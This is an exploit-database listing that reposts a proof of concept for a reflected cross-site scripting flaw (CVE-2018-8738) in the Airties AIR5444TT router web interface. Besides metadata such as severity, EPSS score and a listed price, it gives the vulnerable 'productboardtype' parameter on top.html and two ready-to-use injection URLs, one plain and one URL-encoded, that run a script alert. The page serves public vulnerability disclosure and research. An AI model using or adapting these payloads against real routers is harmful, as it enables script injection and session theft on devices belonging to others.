Advertisement






Airties AIR5444TT Cross-Site Scripting

CVE Category Price Severity
CVE-2018-8738 CWE-79 $1,000 High
Author Risk Exploitation Type Date
Berk KIRAS High Remote 2018-07-07
CVSS EPSS EPSSP
Not available 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018070072

Below is a copy:

Airties AIR5444TT Cross-Site Scripting
# Exploit Title: Airties AIR5444TT - Cross-Site Scripting
# Date: 2018-07-06 
# Exploit Author: Raif Berkay Dincel
# Vendor Homepage: airties.com 
# Software [http://www.airties.com.tr/support/dcenter/]
# Version: [1.0.0.18]
# CVE-ID: CVE-2018-8738
# Tested on: MacOS High Sierra / Linux Mint / Windows 10
 
# Vulnerable Parameter Type: GET 
# Vulnerable Parameter: 192.168.2.1/top.html?page=main&productboardtype= 
 
# Proof of Concepts:
 
192.168.2.1/top.html?page=main&productboardtype=<script>alert("Raif Berkay Dincel");</script>
 
http://192.168.2.1/top.html?page=main&productboardtype=%3Cscript%3Ealert(%22Raif%20Berkay%20Dincel%22);%3C/script%3E

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum